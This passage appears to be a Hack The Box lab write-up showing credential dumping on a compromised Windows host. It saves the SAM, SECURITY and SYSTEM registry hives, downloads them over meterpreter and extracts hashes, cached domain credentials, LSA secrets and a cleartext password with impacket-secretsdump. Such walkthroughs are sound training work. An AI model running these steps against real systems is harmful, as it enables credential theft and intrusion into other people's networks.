Hashdump
Dumping the credential hashes after compromising the wc-3.university.htb host
PS C:\tmp> reg.exe save hklm\sam .\sam
reg.exe save hklm\sam .\sam
The operation completed successfully.
PS C:\tmp>reg.exe save hklm\security .\security
reg.exe save hklm\security .\security
The operation completed successfully.
PS C:\tmp> reg.exe save hklm\system .\system
reg.exe save hklm\system .\system
The operation completed successfully.
meterpreter > download C:\\tmp\\sam
[*] Downloading: C:\tmp\sam -> /home/kali/archive/htb/labs/university/sam
[*] Completed : C:\tmp\sam -> /home/kali/archive/htb/labs/university/sam
meterpreter > download C:\\tmp\\security
[*] Downloading: C:\tmp\security -> /home/kali/archive/htb/labs/university/security
[*] Completed : C:\tmp\security -> /home/kali/archive/htb/labs/university/security
meterpreter > download C:\\tmp\\system
[*] Downloading: C:\tmp\system -> /home/kali/archive/htb/labs/university/system
[*] Completed : C:\tmp\system -> /home/kali/archive/htb/labs/university/systemExfiltrating LSA registry hive
┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ impacket-secretsdump local -sam pe_ws-3/hashdump/sam -security pe_ws-3/hashdump/security -system pe_ws-3/hashdump/system
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xcafb76872642f6bc09dd9e17ae7cddec
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:71ffc7b2d302f8059b92219e7d7a7ba1:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:a8bf1bae201f988dc1ca99f1043e11dc:::
[*] Dumping cached domain logon information (domain/username:hash)
UNIVERSITY.HTB/Martin.T:$DCC2$10240#Martin.T#97cacb28b851029449213555226a7dcc: (2024-11-02 23:30:43)
UNIVERSITY.HTB/Administrator:$DCC2$10240#Administrator#d215fbd6ac39c2d0e49628006db4a2ac: (2024-10-21 23:19:28)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:b005e0d4f4724296a7513d11b36ba2e9ccd669eca34e4985f48c9f6aedadd85d0ecbe634ad06cbbba69c304449de31229f57edbcd3fdca31663bdf085685dd8120eaeded1b27d744d2a466a9ec67c03bb6b6cf28f9b36cf0b0f04431f894e72fc46ba1710beb3fd0998078d482066e613084e0d7b3f7275a4098a4c62f5e4a9553eaadbd1f2241666c7cb55622b9d13bbcd2bec24107acfc91abe33844f9b9279d5784265ffae661820d6338ff4b2b6d9b560f9bcb2de02fc2620813c9cdf7944278b479d05d1509355075fa280f93dc31fd18d6fcc61b3e77091dccb9cdb4e7cefa21596d35c38647284377d6428e7c
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:b51c7661e82feb147afffb324d91af34
[*] DefaultPassword
(Unknown User):v3ryS0l!dP@sswd#X
[*] DPAPI_SYSTEM
dpapi_machinekey:0x1b8c79e73a9fe233c28cc4336b7ef8a310cf7335
dpapi_userkey:0x83c20b2c903526e92b01436284cfc32babe48018
[*] NL$KM
0000 A9 CF 8B DE AB C8 F3 82 92 9F 69 F3 F8 8B C2 F4 ..........i.....
0010 E5 6D AE 0B C5 05 41 8A B3 3C 6A 24 92 D9 F5 95 .m....A..<j$....
0020 BB 90 A6 24 55 AE 8B 6B 7C B5 B2 40 89 52 75 66 ...$U..k|..@.Ruf
0030 0E F1 23 17 89 D5 A2 AD 22 05 F5 D2 7F F6 DC 87 ..#.....".......
NL$KM:a9cf8bdeabc8f382929f69f3f88bc2f4e56dae0bc505418ab33c6a2492d9f595bb90a62455ae8b6b7cb5b240895275660ef1231789d5a2ad2205f5d27ff6dc87
[*] Cleaning up... Besides the credential hashes, there is a CLEARTEXT password; v3ryS0l!dP@sswd#X
Performing password spray